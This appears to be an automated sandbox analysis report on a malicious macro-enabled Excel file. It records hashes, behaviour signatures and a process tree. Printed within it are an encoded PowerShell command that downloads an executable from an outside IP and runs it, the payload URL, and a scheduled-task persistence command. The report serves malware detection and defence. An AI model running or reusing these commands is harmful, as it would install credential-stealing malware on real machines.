Analysis
-
max time kernel
125s -
max time network
151s -
platform
windows10_x64 -
resource
win10-en-20211014 -
submitted
25-10-2021 12:46
Static task
static1
Behavioral task
behavioral1
Sample
Sample_03018200_ISO_03512328.xlsm
Resource
win7-en-20211014
Behavioral task
behavioral2
Sample
Sample_03018200_ISO_03512328.xlsm
Resource
win10-en-20211014
General
-
Target
Sample_03018200_ISO_03512328.xlsm
-
Size
389KB
-
MD5
02c95603229648cdcc202dbfcb0986d1
-
SHA1
3e54ebf74799844c8de1922c5cd4b60f1d8c0340
-
SHA256
54ff9c472be10b924ae15c252e08bb870e1a1cf8361a00b74cc0d03113dd6e54
-
SHA512
5c714532a453ace9c32662acbe9872a670946ef3bca244226f48d882737424a3c9561b11f2ad8b9241c64ed1d48f007b60423043b7c973df80767715f9e9b3ee
Malware Config
Extracted
http://18.159.149.5/nbl/joy/1-1/Sample_03018200_ISO_03512328.exe
Signatures
-
Process spawned unexpected child process 1 IoCs
This typically indicates the parent process was compromised via an exploit or macro.
Processes:
cmd.exedescription pid pid_target process target process Parent C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE is not expected to spawn this process 2976 4112 cmd.exe EXCEL.EXE -
Blocklisted process makes network request 1 IoCs
Processes:
powershell.exeflow pid process 41 1516 powershell.exe -
Downloads MZ/PE file
-
Executes dropped EXE 2 IoCs
Processes:
Xnhhhbltuspnhydgofsx.exeupdate.exepid process 932 Xnhhhbltuspnhydgofsx.exe 3960 update.exe -
Deletes itself 1 IoCs
Processes:
EXCEL.EXEpid process 4112 EXCEL.EXE -
Uses the VBS compiler for execution 1 TTPs
-
Accesses Microsoft Outlook profiles 1 TTPs 3 IoCs
Processes:
vbc.exedescription ioc process Key opened \REGISTRY\USER\S-1-5-21-941723256-3451054534-3089625102-1000\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 vbc.exe Key opened \REGISTRY\USER\S-1-5-21-941723256-3451054534-3089625102-1000\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 vbc.exe Key opened \REGISTRY\USER\S-1-5-21-941723256-3451054534-3089625102-1000\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 vbc.exe -
Looks up external IP address via web service 3 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
Processes:
flow ioc 43 checkip.dyndns.org 45 freegeoip.app 46 freegeoip.app -
Suspicious use of SetThreadContext 1 IoCs
Processes:
Xnhhhbltuspnhydgofsx.exedescription pid process target process PID 932 set thread context of 2036 932 Xnhhhbltuspnhydgofsx.exe vbc.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
-
Checks processor information in registry 2 TTPs 3 IoCs
Processor information is often read in order to detect sandboxing environments.
Processes:
EXCEL.EXEdescription ioc process Key opened \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 EXCEL.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz EXCEL.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString EXCEL.EXE -
Creates scheduled task(s) 1 TTPs 1 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
-
Enumerates system info in registry 2 TTPs 3 IoCs
Processes:
EXCEL.EXEdescription ioc process Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS EXCEL.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemFamily EXCEL.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU EXCEL.EXE -
NTFS ADS 1 IoCs
Processes:
EXCEL.EXEdescription ioc process File created C:\Users\Admin\AppData\Local\Temp\78467F00\:Zone.Identifier:$DATA EXCEL.EXE -
Suspicious behavior: AddClipboardFormatListener 1 IoCs
Processes:
EXCEL.EXEpid process 4112 EXCEL.EXE -
Suspicious behavior: EnumeratesProcesses 4 IoCs
Processes:
powershell.exevbc.exepid process 1516 powershell.exe 1516 powershell.exe 1516 powershell.exe 2036 vbc.exe -
Suspicious behavior: RenamesItself 1 IoCs
Processes:
EXCEL.EXEpid process 4112 EXCEL.EXE -
Suspicious use of AdjustPrivilegeToken 4 IoCs
Processes:
powershell.exeXnhhhbltuspnhydgofsx.exevbc.exeupdate.exedescription pid process Token: SeDebugPrivilege 1516 powershell.exe Token: SeDebugPrivilege 932 Xnhhhbltuspnhydgofsx.exe Token: SeDebugPrivilege 2036 vbc.exe Token: SeDebugPrivilege 3960 update.exe -
Suspicious use of SetWindowsHookEx 13 IoCs
Processes:
EXCEL.EXEpid process 4112 EXCEL.EXE 4112 EXCEL.EXE 4112 EXCEL.EXE 4112 EXCEL.EXE 4112 EXCEL.EXE 4112 EXCEL.EXE 4112 EXCEL.EXE 4112 EXCEL.EXE 4112 EXCEL.EXE 4112 EXCEL.EXE 4112 EXCEL.EXE 4112 EXCEL.EXE 4112 EXCEL.EXE -
Suspicious use of WriteProcessMemory 25 IoCs
Processes:
EXCEL.EXEcmd.exepowershell.exeXnhhhbltuspnhydgofsx.execmd.exedescription pid process target process PID 4112 wrote to memory of 2976 4112 EXCEL.EXE cmd.exe PID 4112 wrote to memory of 2976 4112 EXCEL.EXE cmd.exe PID 2976 wrote to memory of 1516 2976 cmd.exe powershell.exe PID 2976 wrote to memory of 1516 2976 cmd.exe powershell.exe PID 2976 wrote to memory of 1516 2976 cmd.exe powershell.exe PID 1516 wrote to memory of 932 1516 powershell.exe Xnhhhbltuspnhydgofsx.exe PID 1516 wrote to memory of 932 1516 powershell.exe Xnhhhbltuspnhydgofsx.exe PID 1516 wrote to memory of 932 1516 powershell.exe Xnhhhbltuspnhydgofsx.exe PID 932 wrote to memory of 2036 932 Xnhhhbltuspnhydgofsx.exe vbc.exe PID 932 wrote to memory of 2036 932 Xnhhhbltuspnhydgofsx.exe vbc.exe PID 932 wrote to memory of 2036 932 Xnhhhbltuspnhydgofsx.exe vbc.exe PID 932 wrote to memory of 2036 932 Xnhhhbltuspnhydgofsx.exe vbc.exe PID 932 wrote to memory of 2036 932 Xnhhhbltuspnhydgofsx.exe vbc.exe PID 932 wrote to memory of 2036 932 Xnhhhbltuspnhydgofsx.exe vbc.exe PID 932 wrote to memory of 2036 932 Xnhhhbltuspnhydgofsx.exe vbc.exe PID 932 wrote to memory of 2036 932 Xnhhhbltuspnhydgofsx.exe vbc.exe PID 932 wrote to memory of 3204 932 Xnhhhbltuspnhydgofsx.exe cmd.exe PID 932 wrote to memory of 3204 932 Xnhhhbltuspnhydgofsx.exe cmd.exe PID 932 wrote to memory of 3204 932 Xnhhhbltuspnhydgofsx.exe cmd.exe PID 932 wrote to memory of 2628 932 Xnhhhbltuspnhydgofsx.exe cmd.exe PID 932 wrote to memory of 2628 932 Xnhhhbltuspnhydgofsx.exe cmd.exe PID 932 wrote to memory of 2628 932 Xnhhhbltuspnhydgofsx.exe cmd.exe PID 3204 wrote to memory of 5072 3204 cmd.exe schtasks.exe PID 3204 wrote to memory of 5072 3204 cmd.exe schtasks.exe PID 3204 wrote to memory of 5072 3204 cmd.exe schtasks.exe -
outlook_office_path 1 IoCs
Processes:
vbc.exedescription ioc process Key opened \REGISTRY\USER\S-1-5-21-941723256-3451054534-3089625102-1000\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 vbc.exe -
outlook_win_path 1 IoCs
Processes:
vbc.exedescription ioc process Key opened \REGISTRY\USER\S-1-5-21-941723256-3451054534-3089625102-1000\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 vbc.exe
Processes
-
C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE"C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE" "C:\Users\Admin\AppData\Local\Temp\Sample_03018200_ISO_03512328.xlsm"1⤵
- Deletes itself
- Checks processor information in registry
- Enumerates system info in registry
- NTFS ADS
- Suspicious behavior: AddClipboardFormatListener
- Suspicious behavior: RenamesItself
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c C:\Users\Admin\Documents\Bhzhhoufwr.bat2⤵
- Process spawned unexpected child process
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeC:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe -win 1 -enc JABQAHIAbwBjAE4AYQBtAGUAIAA9ACAAIgBYAG4AaABoAGgAYgBsAHQAdQBzAHAAbgBoAHkAZABnAG8AZgBzAHgALgBlAHgAZQAiADsAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkALgBEAG8AdwBuAGwAbwBhAGQARgBpAGwAZQAoACIAaAB0AHQAcAA6AC8ALwAxADgALgAxADUAOQAuADEANAA5AC4ANQAvAG4AYgBsAC8AagBvAHkALwAxAC0AMQAvAFMAYQBtAHAAbABlAF8AMAAzADAAMQA4ADIAMAAwAF8ASQBTAE8AXwAwADMANQAxADIAMwAyADgALgBlAHgAZQAiACwAIgAkAGUAbgB2ADoAQQBQAFAARABBAFQAQQBcACQAUAByAG8AYwBOAGEAbQBlACIAKQA7AFMAdABhAHIAdAAtAFAAcgBvAGMAZQBzAHMAIAAoACIAJABlAG4AdgA6AEEAUABQAEQAQQBUAEEAXAAkAFAAcgBvAGMATgBhAG0AZQAiACkA3⤵
- Blocklisted process makes network request
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
-
C:\Users\Admin\AppData\Roaming\Xnhhhbltuspnhydgofsx.exe"C:\Users\Admin\AppData\Roaming\Xnhhhbltuspnhydgofsx.exe"4⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe"5⤵
- Accesses Microsoft Outlook profiles
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- outlook_office_path
- outlook_win_path
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c schtasks /create /sc minute /mo 1 /tn "Nano" /tr "'C:\Users\Admin\AppData\Roaming\update\update.exe'" /f5⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\schtasks.exeschtasks /create /sc minute /mo 1 /tn "Nano" /tr "'C:\Users\Admin\AppData\Roaming\update\update.exe'" /f6⤵
- Creates scheduled task(s)
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c copy "C:\Users\Admin\AppData\Roaming\Xnhhhbltuspnhydgofsx.exe" "C:\Users\Admin\AppData\Roaming\update\update.exe"5⤵
-
C:\Users\Admin\AppData\Roaming\update\update.exeC:\Users\Admin\AppData\Roaming\update\update.exe1⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
Network
MITRE ATT&CK Matrix ATT&CK v6
Replay Monitor
Loading Replay Monitor...
Downloads
-
C:\Users\Admin\AppData\Roaming\Xnhhhbltuspnhydgofsx.exeMD5
1044474c0c3401651b09cc8886f4039f
SHA160e64f712184f6d9b18ed6f59a07cd16221bbbf3
SHA256c6743515f8490feace6c212ec0714b7c44c840d2be8f9b127e4193b23d752127
SHA512adec67aa84813f3b2752b45816c1f67818b99ded09674ca30a9467ea9f568caf00860e47493b8ace8c163832a2abd2a41ec8252e2bf06d39cbf4ae7d1582882b
-
C:\Users\Admin\AppData\Roaming\Xnhhhbltuspnhydgofsx.exeMD5
1044474c0c3401651b09cc8886f4039f
SHA160e64f712184f6d9b18ed6f59a07cd16221bbbf3
SHA256c6743515f8490feace6c212ec0714b7c44c840d2be8f9b127e4193b23d752127
SHA512adec67aa84813f3b2752b45816c1f67818b99ded09674ca30a9467ea9f568caf00860e47493b8ace8c163832a2abd2a41ec8252e2bf06d39cbf4ae7d1582882b
-
C:\Users\Admin\AppData\Roaming\update\update.exeMD5
1044474c0c3401651b09cc8886f4039f
SHA160e64f712184f6d9b18ed6f59a07cd16221bbbf3
SHA256c6743515f8490feace6c212ec0714b7c44c840d2be8f9b127e4193b23d752127
SHA512adec67aa84813f3b2752b45816c1f67818b99ded09674ca30a9467ea9f568caf00860e47493b8ace8c163832a2abd2a41ec8252e2bf06d39cbf4ae7d1582882b
-
C:\Users\Admin\AppData\Roaming\update\update.exeMD5
1044474c0c3401651b09cc8886f4039f
SHA160e64f712184f6d9b18ed6f59a07cd16221bbbf3
SHA256c6743515f8490feace6c212ec0714b7c44c840d2be8f9b127e4193b23d752127
SHA512adec67aa84813f3b2752b45816c1f67818b99ded09674ca30a9467ea9f568caf00860e47493b8ace8c163832a2abd2a41ec8252e2bf06d39cbf4ae7d1582882b
-
C:\Users\Admin\Documents\Bhzhhoufwr.batMD5
26f4e76105e1ce65d46a488506505a8e
SHA1ea081b9ce8b93bf0aeca01cebb2fbfae4118f341
SHA256b87516affc3c79b900c1fdf1d9086070411c22fad2a665875e032519df22d327
SHA5122a194c8e1dec4702aac07ec24b2804cc184418b0549b66759075fe0a23a8b959aeace549ff02c997da2efd0a7d1a123744c8abc2fa1b1c1389addf913574f916
-
memory/932-344-0x0000000005070000-0x0000000005071000-memory.dmpFilesize
4KB
-
memory/932-334-0x0000000000000000-mapping.dmp
-
memory/1516-308-0x0000000007502000-0x0000000007503000-memory.dmpFilesize
4KB
-
memory/1516-326-0x0000000007503000-0x0000000007504000-memory.dmpFilesize
4KB
-
memory/1516-307-0x0000000007500000-0x0000000007501000-memory.dmpFilesize
4KB
-
memory/1516-298-0x0000000000000000-mapping.dmp
-
memory/2036-346-0x00000000004203EE-mapping.dmp
-
memory/2036-623-0x0000000006C30000-0x0000000006CCC000-memory.dmpFilesize
624KB
-
memory/2628-355-0x0000000000000000-mapping.dmp
-
memory/2976-296-0x0000000000000000-mapping.dmp
-
memory/3204-354-0x0000000000000000-mapping.dmp
-
memory/3960-1114-0x0000000004AD0000-0x0000000004AD1000-memory.dmpFilesize
4KB
-
memory/4112-115-0x00007FF9B5490000-0x00007FF9B54A0000-memory.dmpFilesize
64KB
-
memory/4112-118-0x00007FF9B5490000-0x00007FF9B54A0000-memory.dmpFilesize
64KB
-
memory/4112-119-0x00007FF9B5490000-0x00007FF9B54A0000-memory.dmpFilesize
64KB
-
memory/4112-120-0x000001A52F550000-0x000001A52F552000-memory.dmpFilesize
8KB
-
memory/4112-121-0x000001A52F550000-0x000001A52F552000-memory.dmpFilesize
8KB
-
memory/4112-117-0x00007FF9B5490000-0x00007FF9B54A0000-memory.dmpFilesize
64KB
-
memory/4112-116-0x00007FF9B5490000-0x00007FF9B54A0000-memory.dmpFilesize
64KB
-
memory/4112-122-0x000001A52F550000-0x000001A52F552000-memory.dmpFilesize
8KB
-
memory/5072-356-0x0000000000000000-mapping.dmp